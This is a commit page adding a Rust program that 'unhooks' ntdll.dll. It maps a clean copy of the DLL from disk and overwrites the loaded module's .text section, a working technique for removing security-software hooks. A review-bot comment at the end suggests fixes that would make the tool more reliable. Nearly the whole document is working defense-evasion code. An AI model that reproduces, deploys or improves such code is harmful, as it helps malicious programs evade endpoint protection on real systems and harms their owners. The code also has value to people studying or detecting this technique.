
Commit 222eedf

committedMar 8, 2025
DLL Unhooking
1 parent 21a3e2c commit 222eedf

1 file changed

+103
-0
lines changed

 

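--- a/dll_injection/dll_unhooking.rs
+++ b/dll_injection/dll_unhooking.rs
@@ -0,0 +1,103 @@
+/*
+DLL Unhooking
+Thanks to RedTeamNotes:
+Resource Used From [https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++]
+Author: @5mukx
+*/
+
+
+use std::ffi::CString;
+use std::ptr::{self, null_mut};
+
+use winapi::shared::minwindef::HMODULE;
+use winapi::um::fileapi::{CreateFileA, OPEN_EXISTING};
+use winapi::um::handleapi::CloseHandle;
+use winapi::um::libloaderapi::GetModuleHandleA;
+use winapi::um::memoryapi::{MapViewOfFile, VirtualProtect, FILE_MAP_READ};
+use winapi::um::psapi::GetModuleInformation;
+use winapi::um::winbase::CreateFileMappingA;
+use winapi::um::winnt::{GENERIC_READ, IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64, IMAGE_SECTION_HEADER, PAGE_EXECUTE_READWRITE, PAGE_READONLY, SEC_IMAGE};
+use winapi::um::{processthreadsapi::GetCurrentProcess, psapi::MODULEINFO};
+use winapi::ctypes::c_void;
+
+fn main(){
+unsafe{
+let process: *mut c_void = GetCurrentProcess();
+let mut mi: MODULEINFO = std::mem::zeroed();
+let ntdll_cstr = CString::new("ntdll.dll").unwrap();
+let ntdll_module: HMODULE = GetModuleHandleA(ntdll_cstr.as_ptr());
+
+GetModuleInformation(
+process,
+ntdll_module,
+&mut mi,
+std::mem::size_of::<MODULEINFO>() as u32,
+);
+
+let ntdll_base = mi.lpBaseOfDll;
+let ntdll_file = CreateFileA(
+ntdll_cstr.as_ptr(),
+GENERIC_READ,
+0,
+null_mut(),
+OPEN_EXISTING,
+0,
+null_mut(),
+);
+
+let ntdll_mapping = CreateFileMappingA(
+ntdll_file,
+null_mut(),
+PAGE_READONLY | SEC_IMAGE,
+0,
+0,
+ptr::null(),
+);
+
+let ntdll_mapping_address = MapViewOfFile(
+ntdll_mapping,
+FILE_MAP_READ,
+0,
+0,
+0
+);
+
+let hook_dos_header = ntdll_base as *const IMAGE_DOS_HEADER;
+let hook_nt_header = (ntdll_base as usize + (*hook_dos_header).e_lfanew as usize) as *const IMAGE_NT_HEADERS64;
+
+for i in 0..(*hook_nt_header).FileHeader.NumberOfSections{
+let hook_sec_header = (hook_nt_header as usize + 0xF8 + (i as usize * 0x28)) as *const IMAGE_SECTION_HEADER;
+
+if (*hook_sec_header).Name.starts_with(b".text\0") {
+let mut old_protect = 0u32;
+let section_base = (ntdll_base as usize + (*hook_sec_header).VirtualAddress as usize) as *mut u8;
+let section_size = *(*hook_sec_header).Misc.VirtualSize() as usize;
+
+VirtualProtect(
+section_base as *mut _,
+section_size,
+PAGE_EXECUTE_READWRITE,
+&mut old_protect,
+);
+
+std::ptr::copy_nonoverlapping(
+(ntdll_mapping_address as usize + (*hook_sec_header).VirtualAddress as usize) as *const u8, // Source Address
+section_base, // Destination Address
+section_size, // Size
+);
+
+VirtualProtect(
+section_base as *mut _,
+section_size,
+old_protect,
+&mut old_protect,
+);
+}
+}
+CloseHandle(process);
+CloseHandle(ntdll_file);
+CloseHandle(ntdll_mapping);
+CloseHandle(ntdll_module as *mut c_void);
+}
+}
+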
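Review bot: The cleanup block at the end of main (file lines 97–100) passes two values to CloseHandle that are not kernel object handles: `process` is the pseudo-handle returned by GetCurrentProcess, which needs no close, and `ntdll_module` is an HMODULE (a module base address), so `CloseHandle(ntdll_module as *mut c_void);` is an invalid-handle call and should be dropped. The view returned by MapViewOfFile is never released; add `UnmapViewOfFile(ntdll_mapping_address);` (from `winapi::um::memoryapi`) before the remaining handles are closed. No return value in the function is checked: if GetModuleInformation fails, `mi` stays zeroed and `(*hook_dos_header).e_lfanew` dereferences a null pointer, and a failed CreateFileA or MapViewOfFile feeds INVALID_HANDLE_VALUE or null into the same dereference path, so each call should bail out on failure rather than continue. The header comment should also document that the section-header offset is hardcoded (`0xF8 + i * 0x28`) and that every pointer read here is unvalidated, so the `unsafe` block carries no `// SAFETY:` justification for the dereferences it performs.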

0 commit comments
